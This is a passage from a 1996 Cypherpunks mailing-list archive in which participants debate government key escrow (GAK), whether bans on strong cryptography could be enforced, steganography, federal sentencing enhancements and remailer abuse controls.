of the government secret key could purchase many of them frequently
to reduce the damage.

(Earlier I said something about GAK harming Net commerce.  It does,
but not irreparably.  It delays its onset and increases its cost.)

> (This is another reason we want to delay action on crypto for as long as
> possible: make encrypted communications so widespread in commerce that to
> pull the plug would mean a financial calamity.)

GAK does not require anybody to pull the plug.  It could be implemented
as an add-on to PGP with extraordinary ease.  PGP (Tim knows this, this
is for others) currently encrypts the session key with the recipients
public key.  You would just have to extend this to also encrypt the
session key with the government key, maybe one you purchase for your
own communications.

> * Intent. It's hard to imagine someone being imprisoned for using
> cryptography, except perhaps in wartime conditions. I may be wrong. Also,
> there are deep Constitutional issues we haven't been much discussing.

If the Four Horsemen scenario were correct, then it is easy to envision
strong public support for the crime of practicing unlicensed cryptography.
If I believed that I might get shot if we didn't have such restrictions,
I would be might inclined to support such laws myself.

The Constitution can be amended, and Judges tend to be compliant when
there is a national consensus and when they want to make very sure that
nobody is using Assassination Politics to put them in the crosshairs.

> * Offshore sites. Even if U.S. citizen-units are proscribed from using
> crypto--a hard thing to do--many crypto-anarchic markets will flourish
> overseas. (If communication with offshore persons or sites is allowed, all
> sorts of things can be done. If such communication is banned, this means a
> profound change in the American system.) [I have not fleshed out the
> arguments here, adequately, so don't focus on this point to rebut the rest
> of my arguments, please.]

Yes, I agree with this.  In many other countries they are going to be
simply too disorganized to outlaw strong crypto.  If the Four Horsemen
scenario is correct, these societies will dissolve into Hell.  Sad,
for them!  The USG may see this as positive in terms of its hegemonic
desires.

But, this does affect the American situation.  Strong border controls
would have to be in place to hamper efforts to bring troublesome
technologies here and to prevent the importation of assassins.

> In another post, Peter posits a condition where people are appalled at the
> implications of crypto and there is no popular support for it. But is he
> implyiung that neighbors will burst into the homes of others to ferret out
> crypto. I doubt this vigilantism will ever happen.

I also doubt that it will happen because it will turn out that
cryptoanarchy is basically a positive development.  Even in the Four
Horsemen scenario, I think it unlikely that vigilantism will be
necessary.  Neighbors will simply inform on their "nerdy" neighbors
and collect that $50,000 reward and feel they did good by doing it.
Search warrants will take care of the rest.

However, I could imagine vigilantism developing if unlicensed cryptography
became sufficiently unpopular.  Certain crimes are seen as so offensive
that many people would be delighted to take the law into their own hands.

There was a border incident during the Second World War between Switzerland
and Germany.  Switzerland ("The Little Porcupine", as the Germans would
have it) was attempting to stay out of the war.  Refugees from Germany
were returned if they were found.  This resulted in some ugly handoff
scenes at the border.  In one of them, an SS man (I believe) who was taking
custody of a family had the poor taste to throw a baby on the ground
as hard as he could.  The Swiss border guard expressed his disapproval
of the man's poor manners by shooting him dead on the spot.

This caused a major diplomatic crisis for Switzerland.

It is interesting to speculate on whether the Swiss border guard did
the right thing, but few people will fail to have a strong visceral
reaction in his favor.  People just don't like seeing children come
to harm.

If unlicensed cryptography were seen as an equivalently heinous crime, you
might well see vigilantism come into the picture.

> (My gun example is apropos. I believe we are fast approaching a point where
> most people want guns outlawed. But it won't happen, as there are not
> enough cops and military people willing to raid private homes in
> contravention of the Bill of Rights and at personal risk to
> themselves....and so it won't happen.

I should point out that when I say "strong public support" I mean something
on the scale of how people feel about murder, not 51% of the voters.
The same thing is true of guns.  Sure, a majority of the people might
vote for gun control, but the gunnies feel so strongly about it and
are so stubborn and so well organized that it isn't really worth the
trouble.

> Once crypto is deeply intertwined into the fabric of life and commerce,
> it'll be too late to pull the plug.

I think this is true, but only because it will be clear that the benefits
of GAK (if there are any) would clearly not be worth the effort.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 23:08:36 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b13aea8881314fb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:48 PM 11/7/1996, Timothy C. May wrote:
>At 7:20 PM -0800 11/7/96, Peter Hendrickson wrote:
>...
>> I cannot speak for the GAK advocates.  However, you could establish a
>> system where messages between two countries are encoded with keys
>> which are made available to only the two countries in question.
>>
>> A really simple scheme to do this would be for each country to publish
>> a public key.  You would be required to encrypt the key to the message
>> with the national public key.  That scheme would be fast to deploy.

> Well, this is not what the proposals for GAK involve. If it were _only_ a
> matter of each country requiring GAK for communicatons entering its
> country, then this would be as you describe (not that many of us would
> approve of it).

> What complicates matters is that the U.S. proposes that _it_ keep
> records/escrows of communications with, say, recipients in Libya. Or
> Russia, or Burma, or Tazbekinoya. This means automatically that simplistic
> models ("encrypt to the public key of Tazbekinoya" will not be sufficient).

The U.S. would have to concede this point, and it would be a likely one
for it to concede.  The reasonable Schelling point for inter-governmental
relationships on this matter is for the each government to have access
to whatever communications it likes within its borders but that the
contents of communications between governments is shared.  This could
be set up exactly the same way tax treaties are set up now.

Technically, this is not hard to do.  For instance, I think PGP encrypts
messages for multiple recipients by encrypting the same session key
with each recipient's public key, and then attaching the same IDEA
encrypted ciphertext:

<Session Key with Alice's Public Key><Session Key with Bob's Public Key>
<IDEA encrypted message>

All GAK requires is that you also encrypt the session key with the
government's key:

<Session Key with Alice's Public Key><Session Key with Bob's Public Key>
<Session Key with Eve's Public Key><IDEA encrypted message>

For multiple government access to keys, you encrypt the session key
with the foreign government's key, too:

<Session Key with Alice's Public Key><Session Key with Bob's Public Key>
<Session Key with Eve's Public Key><Session Key with Yvette's Public Key>
<IDEA encrypted message>

>> In a more complicated and secure scheme, you would be given a public key
>> from each country that was unique for your communications at the same
>> time you were granted your international communications license.  The
>> unique public key would be managed by a small group of people.  This
>> means that if it was ever compromised, most message traffic would be
>> secure and those who were responsible would be easy to find.
>>
>> The only way you are at the mercy of the Libyans is if you do business
>> in Libya.

> No, I think you are missing the point. The issue about Libya is that the
> GAK system must make decisions about when and under what conditions it
> accedes to government wishes--for governments we may be hostile toward.

> Or governments may be hostile toward us.

Yes, there is a problem with uncooperative foreign governments who
won't prosecute people who send in non-GAKed messages.  So, we simply
terminate communications with those countries.  It's something the
government wants to do anyway, so it's not a painful pill to swallow.

> As I said in another message, I don't think there can be a unified GAK
> policy. I believe the U.S. Administration hopes to browbeat enough nations
> into compliance such that it--the U.S. government--controls which keys are
> released and which are not. My point about "rogue" governments is that the
> problems of Burma, Libya, etc. will not vanish. Clearly the U.S. government
> will not settle for waiting for Libya or Burma to co-release keys....

The scheme I described above does not require co-release of keys.

It may be the case that the USG is trying to pull a cypherpunk maneuver
on other less sophisticated governments.  That is, they are probably
telling the other governments, "You've got a real problem here.  You
will be overthrown if you don't get our help fast with our sophisticated
encryption technology!  And if you don't let us help, you'll lose most
favored nation status."  By the time other policy makers figure out the
implications of this, it will be too late.  Sad for them, but good
news for the U.S. consumer.

> And nothing in GAK says one gets to communicate with Libyan parties by
> encrypting with the public key of Libya, thus bypassing the U.S. decryption
> capabilities!

Nothing stops you from sending fully encrypted messages to Libya except
your fear of social disgrace and a long prison term.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Thu, 7 Nov 1996 23:45:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Any additional information on Kata, TX. decision??
Message-ID: <199611080730.XAA07879@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sombody posted some information about Child Protective Services interrogating children without parental permission, etc and the decision that followed being upheld in favor of the state.

would you be so kind as to provide the entire available clip or a URL.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Thu, 7 Nov 1996 20:47:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9611080435.AA27183@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Nov 1996, Bill Frantz wrote:

> At  4:39 AM 11/6/96 -0500, Jim Ray wrote:
> >Judge Kozinski wrote:
> >> ... Perhaps the answer
> >> is that the post office should not accept mail unless there
> >> is a clear indication of who the sender is on the upper left
> >> hand corner of the envelope. ...
> 
> In the case of postal mail, return address forgery is so easy that anyone
> who can address an envelope can figure it out.  Requiring something
> scribbled there certainly wouldn't help protect against anonymous mail. 
> You would have to couple it with "is a person" checks to ensure the person
> posting it is the person referenced by the return address.  Bye bye corner
> post box.

Yes the failure to forsee this did stand out a little in the discourse :).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 7 Nov 1996 19:44:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b00aea82fb2502a@[192.0.2.1]>
Message-ID: <Pine.LNX.3.95.961107232620.1475A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 7 Nov 1996, Peter Hendrickson wrote:

> If mandatory GAK were imposed, reviewing messages is easy, even with
> inter-agency fighting.  Or, encryption in general could just be
> forbidden if GAK created too much hassle.

How would this be possible?  The latest GAK proposal is for companies to store
keys instead of the government.  There is the potential for colaboration
between a TLA and an "escrow" company.  It is also possible for a TLA to
illegally obtain the keys from the company's database.  However, it would
still be impossible to review every message.  Even if the government had full
access to all encryption keys, it would still be technically infeasible to
review every message.

> In practice I suspect that good stego is hard.  You don't have to be
> right every time when you look for it, just some of the time.  When
> you see packets that seem kind of funny to you, the judge issues you
> a warrant and you search the suspect's house and computer very carefully.
> If stego is in use, the software that generated it can be found.  Then
> you hand out a life sentence.

Good stego is possible.  Stegoing data in jpegs is very secure and probably
infeasible to detect.  This scenario is not entirely unrealistic -- in some
states a rise in electrical bills is enough to get a judge to issue a search
warrant to search the suspect's home for evidence of marijuana cultivation.
However, I find the life sentence idea pretty unrealistic.  You are assuming
that there will be wide support for tough restrictions on crypto.  This is
not currently the case and I doubt it would ever get to this point.

Not very many people are currently supporting any life sentence for anyone
who is in possession of explosives, despite the increase in terrorist
activity.  Gun-control advocates aren't supporting laws that will give a life
sentence to anyone who owns a gun.  Given that many people who believe in
gun-control and tagants in explosives are against GAK, why do you think there
will be such a revolt against strong crypto?  

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMoK68yzIPc7jvyFpAQHN5QgAhsvpuZPwvGV32VTlzS+fRuLXXwWDqmQL
0/etFQkdo0aOwOm8qnGHQzq796tOQVDBFVE8QJSiQqCqukETc1G+E2IDqA53Yl5f
xhCfKjBOcp2ZA63ZjKZYd6nVKnoxlgnz5BfVlShMVdxFDszo2SC4HqSvBhRDOjZr
npGhDPRiabTWEs4tAXUvh5ymelCBtgdLmDAjPKPgTYnloWUIUNBkGQ1pvRYD/lAs
OeL/OPJNNicmKFx1kN9Xx6NP/IYhmS9qUE0qQ0iPUWo8hILqA4ZgIaxY826M6ikQ
6/RMsBzIg03xzrWw4gOYB2HyC0Hk/sDTgMNiHxYvy6ugfzdweO/yCg==
=mlYb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 7 Nov 1996 23:59:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b12aea8799caeb0@[192.0.2.1]>
Message-ID: <v03007806aea897a69b26@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 PM -0800 11/7/96, Peter Hendrickson wrote:

>Somebody brought up the Catholic church's custom of confessionals
>a few weeks ago and suggested that it was a powerful political
>tool.  (Sorry I can't remember who said this.)  I am sure this

That was me, actually. The confessionals and the priests acted as an
incredibly powerful means for the Church to know what the prole were up to,
who was associating with whom, and so on. And the Church had their own
communications systems. Truly a virtual community, regardless of the
political region they found themselves in.

(I would comment on the rest of Peter's points, but he has gone from
near-silence over the past six months that I have known him (and he was
presumably on the list before I met him at a CP meeting last spring....) to
posting dozens of long messages in one day, so I can't keep up.)

I don't believe it is as easy to differentiate between unencrypted and
encrypted traffic as Peter believes, and I definitely don't believe the
United States could stand--in the form it is in now, Consitutionally--if
forms of language and speech were to be banned and violators of the ban
were to receive harsh treatments.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Fri, 8 Nov 1996 00:20:50 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: criminalizing crypto use
Message-ID: <3.0b28.32.19961108001437.00701700@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:43 PM 11/7/96 -0800, Tim May wrote:

>* Intent. It's hard to imagine someone being imprisoned for using
>cryptography, except perhaps in wartime conditions. I may be wrong. Also,
>there are deep Constitutional issues we haven't been much discussing.

One change I suspect we'll see sooner or later on the Federal side is an
amendment of the Sentencing Guidelines to include an upward adjustment for
the use of encryption to frustrate law enforcement efforts. This wouldn't
be a conviction for using crypto, but would result in harsher penalties for
people convicted of other crimes where they happened to use crypto in a way
connected with the crime. (Keeping child porn or records of a forbidden
business on an encrypted disk volume, using PGPfone to conspire across long
distances, etc.)

As an example, less than a year ago, Congress directed the Sentencing
Commission (a sub-branch of the federal Judiciary) to amend the guidelines
to enhance the penalties by at least two levels for using a computer to
advertise or "ship" a visual depiction of child porn. Pub. L. 104-71, Sec.
2 (12/23/95). 

Sentences for felony and some misdemeanor convictions in Federal court are
usually based upon a payoff matrix, where a crime is assigned a "base
offense level" (higher levels indicate more serious crimes), which is then
adjusted upwards for aggravating factors (like the use of a gun, or an
elderly victim, or prior convictions) and mitigating factors (like
admission of responsibility or cooperating with law enforcement) to arrive
at a final score, which indicates a relatively narrow range of potential
sentences. Adding an enhancement for crypto use seems like an easy way for
legislators to "get tough on crypto" while avoiding Constitutional issues.
(It also strikes me as pointless; I have yet to run across anyone who
doesn't work in criminal law (or isn't in a federal pen) who seems to have
any idea that the sentencing guidelines exist, much less take them into
account when planning crimes. They're pretty complex.) 

I feel a little wary about saying this because I haven't heard anyone
mention it before. I have no secret insider knowledge. But I think a step
like this is probably transparent to the folks in the Justice Dept who work
on computer crime and crypto stuff, so I'm probably not giving anyone any
ideas. I hope not. Federal court is tough enough for defendants already. 

Folks who want to know more about the Sentencing Guidelines might take a
look at <http://www.ussc.gov>. They've done a nice job of putting
everything on the web, so you can scratch your head in puzzlement at home,
instead of at the law library. Many states also use a similar system for
sentencing in criminal cases, but they may not be crypto-savvy enough to
think of adding extra penalties for crypto use. 


--
Greg Broiles                | "In this court, appellant and respondent are the
gbroiles@netbox.com         |  same person. Each party has filed a brief."
http://www.io.com/~gbroiles |  Lodi v. Lodi, 173 Cal.App.3d 628, 219 Cal.
                            |  Rptr. 116 (3rd Dist, 1985)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 00:27:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b18aea892cd9a1b@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:52 PM 11/7/1996, Huge Cajones Remailer wrote:
> Look around at all the laws in a community that are unenforceable and
> largely ignored by significant sections of the community. Taxes are a
> classic with many people receiving cash and not declaring it..I suppose
> you could say they just opt not to pay taxes while law abiders (to varying
> degrees) opt in to pay tax.

I agree.  It would be necessary to marshal widespread public support
to eliminate strong crypto.  If the Four Horsemen scenario is
available, this support would be available.

> It is estimated here where all dogs, for example, are required to be
> registered, that only 40 percent are in fact registered (ie pay the dog
> tax). The authorities simply do not, with their current technology, have
> the ability or political will to break down everyone's front door and
> complete house to house dog searches then deal with court cases and bring
> eveidence as to the actual owner of the animal where this is a relevant
> matter to be proved.

Sure, it's not really worth the effort.  How much effort will you
go to prevent your children from being kidnapped?

> Consider the difficulty of actually outlawing say PGP and making it
> stick. To ban its use on a network compliance measures such as routine
> traffic scanning would be implimented. So users may say resort to direct
> modem to modem systems thus forcing authorities to routinely tap
> telephone calls, identify modem calls, and analyse these calls. The
> authorities start to use scarce resources provided by those members of
> the public that choose to pay taxes to them.

In the case of a largely compliant public, this isn't all that expensive.

> The authorities have to spend even more resources on publicity and scams
> to align privacy advocates with terrorists. Some privacy advocates may
> even become terrorists who before didn't really care for such tactics.

This is a highly likely scenario.  But in the scenarios proposed by
the GAKers, even the privacy advocates would be reluctant to defend
crypto.

> Assume the snail mail route is effectively sqaushed what then? Well you
> could voice call your friend and read the encyphered text to them over
> the phone and they could then run it through pgp and decrypt it. If the
> authorities effectively made this too costly (in terms of risk etc) then
> you could always just jump on a plane and tell them the message
> personally or send someone else to do that for you.

Gee, I hope you don't have to send many messages if you have to travel
across the country to deliver them.  How will you operate an anonymous
business this way?  It doesn't sound like cryptoanarchy to mean.

> The costs of compliance increase as the authorities take measures to put
> the genie back in the bottle. Stealth versions of popular programs get
> released, and further technological advances are made so that the problem
> becomes greater with respect to compliance as do the costs to the
> taxpayer of ensuring compliance. Encrypted data that cannot be easily
> distinguished form noise would require routine analysis and attempted
> cracking of every bit of data transmitted..a task that would soon bring
> even the great US economy to its knees assuming the people didn't put a
> stop to the madness before it reached that point.

I think people probably would put a stop to the madness.  But, under
the Four Horsemen scenario, most people, even Mr. Huge Cajones Remailer,
would not consider it to be madness.

> Just as an aside, I am sure the various spook angencies in the 'free
> world' are well aware of these issues and no doubt other issues I have
> not imagined and such considerations have played a part in so far stalling
> an outright ban on the use of effective encryption programs and devices.

This is interesting.  I would be quite interested to see real evidence
that various spook agencies have been foot dragging on the GAKers plans.

> There are always costs to a government in the reduction in freedoms, and
> the ultimate cost to any particular government is that it may stir the
> beast so much that it awakens and takes away that governments authority
> whether by democratic means or otherwise.

Yes, this is correct.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 00:28:03 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b19aea8952827f5@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:11 PM 11/7/1996, Timothy C. May wrote:
>At 5:16 PM -0800 11/7/96, Peter Hendrickson wrote:
>
>> While the term "police state" is not well defined, I do not believe it
>> applies to what I am describing.  (There is a risk that it could develop,
>> however.)

>> Laws forbidding the use of cryptography have ominous free speech
>> implications as we would be attempting to outlaw concealed meaning.
>> Concealed meaning can be pretty well concealed and that makes
>> for difficult and dangerous legal questions.

> If the only means of detection is raiding homes to inspect them for
> contraband--something not even done during the height of the anti-drug
> hysteria, at least not on a regular basis--then I stand by my comment that
> stopping private use of cryptography requires a police state such as the
> world has not yet seen.

Perhaps initially, during the state of emergency declared by our heroic
and courageous President, some unfortunate abuses of authority may occur.
But, after the first 90% of the terrorists are incarcerated, we will
have the luxury of returning to an orderly legal system replete with
search warrants.

Keep in mind that the drug laws face a large number of dedicated
opponents who will go to great trouble to evade the laws.  I suspect
that these people are in the majority, although I don't know for sure.

I find it hard to believe that any sizeable number of people would
find the Four Horsemen scenario tolerable.

>> On the other hand, the action of running a program which uses forbidden
>> crypto systems is pretty unambiguous and could be effectively isolated
>> from other kinds of speech.

> Oh? How? If the output of such a program looks like quantization or Johnson
> noise in a recording, then how could this form of "speech" be effectively
> isolated?

Sorry, I wasn't very clear.  What I mean is that once you've been
caught red handed with a stego program, the game is up.  That is, I think
it is possible to get ideas of who is operating illegally from interceptions.
(I may well be wrong.)  But, the actual evidence is easily collected
off your computer.  A program which performs encryption or stego is
not very ambiguous about what it is doing.

>> Many kinds of speech are already illegal.  For instance, I am not allowed
>> to copy somebody else's speech because it would violate copyright laws.
>> I am not allowed to break verbal contracts.  In essence, I am punished
>> later for the something I said if I am forced to keep my word.  But,
>> this does not constitute a police state.

> Careful! Some of your examples are not examples of _prohibited_ speech, but
> are instead examples of _actionable_ speech. The Constitution is fairly
> clear that the government cannot be a filter or censor for speech.

> Hence, requirements that people speak in English, or in some other language
> that the government can understand, is not required. Not even in a criminal
> case, as a matter of fact. (If I speak only Skansko-Bravatlian, and am the
> only such speaker in the world, I cannot be compelled to study English or
> even Spanish prior to a trial.)

> Requiring people to speak or write in a language that is understandable to
> some GS-10 at Fort Meade would appear to violate the First Amendment in a
> rather serious way. As encrypted speech is really just another language
> (tell me I'm wrong on this, anyone), encrypted speech appears to be fully
> protected by the First Amendment, which says that Congress shall make no
> law about speech, blah blah.

Under the right legal environment, and we are not far from it, none
of this matters.  The Courts can be quite liberal when they think there
is a good reason for it.  Take seating in restaurants.  If you read
the Constitution you won't find where the Federal Government is empowered
to regulate this.  The Courts decided that the Commerce Clause was
a reasonable justification.  This argument resembles the peace of God.

All the Justices have to say is that the Constitution does not specify
private speech, just public speech.  The same way it doesn't say
"assault rifle" it says "arms".  The same way it doesn't say "commercial
speech" just "speech".

The Constitution will likely be a powerful support for cryptoanarchy,
but only because I doubt widespread opposition to strong cryptography
will arise.

>> What I am proposing would not require an end to fair trials or warrants
>> or really any other legal customs we have.

> I strongly disagree. Prosecution would involve making certain _forms_ of
> speech illegal (not the same thing as the _content_ being illegal, as in
> ordering the kililng of another, or treason, or shouting "Fire!"
> improperly).

But we are not objecting to content!  We don't care what goes inside
the encryption - unless it involves extortion, murder, child pornography,
or weapons data - we care that communication has been limited.  Cryptography
is not a language because nobody can understand it but the recipient.
We simply want the recipient to share with the rest of the class - that
is an independent legal issue from persecution for one's beliefs which
is of course, and thankfully, unconstitutional your Honor.

Or how about this argument: It isn't the encrypted message that we
care about so much, your Honor.  We care that it is evidence that
the perpetrator did commit the illegal act of encrypting his
communications using military-grade technology which is now highly
illegal.

When I say it doesn't really put an end to most legal customs, I mean
that the courts do not have to behave all that capriciously to make
the law stick.  For the most part people know how not to break the
law and the people who are convicted did break it.  Other speech
rights do not immediately dissolve away.  Yes, there is a risk that
they will do so later, but the police state is not required to suppress
cryptoanarchy if there is strong public sentiment supporting it.

> And detection and collection of evidence would almost certainly involve
> illegal searches and seizures.

Not in the presence of wide public support.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 00:28:08 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b1aaea89d53136e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:55 PM 11/7/1996, Timothy C. May wrote:
> "Truly noisy sources" are not at all unusual. Actually, the hard part is
> ever proving a source is _not_ noisy. (There are deep issues involving
> randomness here, and I usually go into the work of Kolmogorov, Chaitin, and
> others at this point. Consult the archives, or see a book on information
> theory.)

Truly, I am out of my depth.  But, I will plunge ahead nonetheless.

I think it is hard to show that a source is noise.  Using only the
signal itself, I believe it is impossible.  That means there may
be patterns which you cannot prove do not exist.  That is surely
less than ideal, especially if you are betting your life on it.

And there are all sorts of ways you can blow your cover.  Maybe
your traffic patterns are sort of odd.  Maybe you are up at odd
hours.  The weakness is stego does not have to be great before
you are put on the suspect list.  If cryptoanarchy is unpopular,
you are in big trouble because the government can afford to watch
you intensively.

> The legal issue is this: can we pass laws and have them upheld by the
> courts which impose severe penalties on people for the supposed crime of
> having in their possession sequences of numbers which cannot be converted
> to meaningful English sentences? I maintain that the Constitution says we
> cannot. Of course, if the Constitution is thrown out, then the old
> Cypherpunk joke may come into play: "Use a random number, go to jail." (An
> Eric Hughes quote, from 1992-3.)

What Tim May maintains may be more reasonable that what the Supreme
Court maintains.  But it's the Supreme Court that will rule.

We have laws which state, in essence, that certain large numbers
cannot be copied legally if they are related to copyrighted executables.

>> In the model I am positing, there would be broad popular support for
>> such policies.

> I think you are assuming a lot.

I think I am, too.  I don't subscribe to the Four Horsemen scenario.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Fri, 8 Nov 1996 00:26:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b07aea84b33c6fd@[192.0.2.1]>
Message-ID: <v03007804aea89bd39b78@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain



Peter Hendrickson writes:
[...]
>> Get a warrant, search my system, find nothing but a bunch of applications
>> and a collection of risque (but definitely legal) pictures which I exchange
>> with a few friends.  You may suspect that when the images are concatenated
>> in a particular way the low-order bits form a stego filesystem but no one
>> will be able to prove it in court.
>
>Are you concatenating these images by hand?  If so, the level of entropy
>is probably low enough to recover the information through brute force
>methods or you are hiding a very small amount of information.

I hide the relatively small amount of data within a very large amount of
data which makes it impossible to find.  Data from analog sources, like
the "real world" (images, sounds, etc) is noisy.  This is a fact of life.
Because this data is noisy I can hide information in the noise.  As long
as the information I am hiding maintains the same statistical properties
of noise it is impossible to pull the information out of the data file unless
you have the key.  If I am paranoid enough I can make this key impossible
to discover without a breakthrough in factoring.  This is the essence of
steganography and the nature of signal and noise are fundemental principles
of information theory.  No legislative action or administrative decision
can change the laws of mathematics, this fact alone is why the crypto genie
is forever out of the bottle.

>If you are not doing it by hand, you own terrorist software and will pay
>the price.

Ah yes, terrorist programs like cat and perl and operating systems like
Linux which contain a loopback filesystem that I can hook a perl
interpreter into at compile-time (which is enough for me to rewrite the
program from scratch each time if necessary, unless things like math
libraries are also outlawed on computers :)  I think that the crypto
concentration camps are going to be very crowded places.

jim, who answers to a higher law: the laws of mathematics...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Fri, 8 Nov 1996 01:00:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Blocking addresses by default
Message-ID: <1.5.4.32.19961108085824.003b5868@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> With remailer abuse becoming more popular and remailers going down
>> because of complaints, there seems to be some interest in remailer
>> software that will block all email by default and will only pass
>> along email that is explicitly unblocked.

Rich wrote:
>I think this threatens serious security problems for the remailer 
>network in two ways:
>1. You'd create a list of people interested in anonymous information,
>   which could potentially be obtained by police or other armed thugs.
>2. The traffic would go down so substantially that traffic analysis     
>   would be trivial.

Yeah.  If you keep a centralized list, it's too risky.
I've been thinking about how to implement a related approach -
when the mailer receives anonymous mail for you, it sends a message saying
        Subject: Anonymous message #<cookie> 
        Hi!  You've got an anonymous message!  
        Here's how to retrieve it / block future messages / accept all
future....
        <disclaimers, explanations, etc.>
and you can send back the cookie to retrieve the message.
Blocking or accepting also using the cookie, to reduce denial-of-service
and spam attacks.  

This approach is primarily useful for terminal remailers, but if you set up 
the syntax carefully, you can get the things to relay to each other.
It's not particularly useful for posting news, though.
Since it is good for terminal remailers, that may make it less hassle
to run them.



#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Fri, 8 Nov 1996 01:02:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <1.5.4.32.19961108085827.003980d8@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


To a large extent, it's a volume question - if there's too much
widespread use, it's too hard to control, prevent, or ban later.
If the volumes of traffic and users are low, you can track users.
So the government's working hard to keep volume down, both by
export controls, FUD attacks on Phil, and constant offers to deal,
such as Clipper I, II, III, and IV, all of which both delay widespread use
of real crypto and try to introduce pre-wiretapped crypto instead.

Strong vs. weak crypto isn't the real issue - for most business use,
weak crypto is obviously unacceptable, but strong crypto with GAK
is ok as long as it doesn't interfere with use (and as long as the
government bureaucrats don't sell too many keys.)  After all, any 
corporation, and most businesses, can be forced to keep and produce records
when the government wants them to; a government-held master key
doesn't change their "legitimate" access, only the convenience
of legal and illegal access.  Key Recovery, on the other hand,
implies that you're required to either use GAK or use Weak Crypto,
which is obviously Bad.  Most businesses are far more opposed to things
that make them wait for bureaucratic action in their day-to-day business
than to the privacy issues, and they're more concerned about
control and convenience than the economic rights issues (otherwise
they'd be refusing to pay taxes....)

The government might be able to stop new Netscape versions from
using strong crypto - threatening to confiscate the company's
ill-gotten gains from aiding and abetting money launderers might help,
and threatening to confiscate PCs that use unapproved crypto.
But it's tough to use a widespread threat like that on popular
software once it's out there.

A friend of mine lives in a kleptocracy; the local thugs haven't stolen
his email provider's computer yet, mainly because the hardware
doesn't work very well without software and administrators.
But he's not willing to risk using PGP very often, because the
volume is small enough they can watch everything (they give him
enough trouble occasionally for using his native language on the phone
instead of the local languages.)  And sending stego isn't likely
to be a good solution for a while, since mail volume is low enough
to his remote area that sending lots of scanned photographs
would be a big impact on email costs.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk





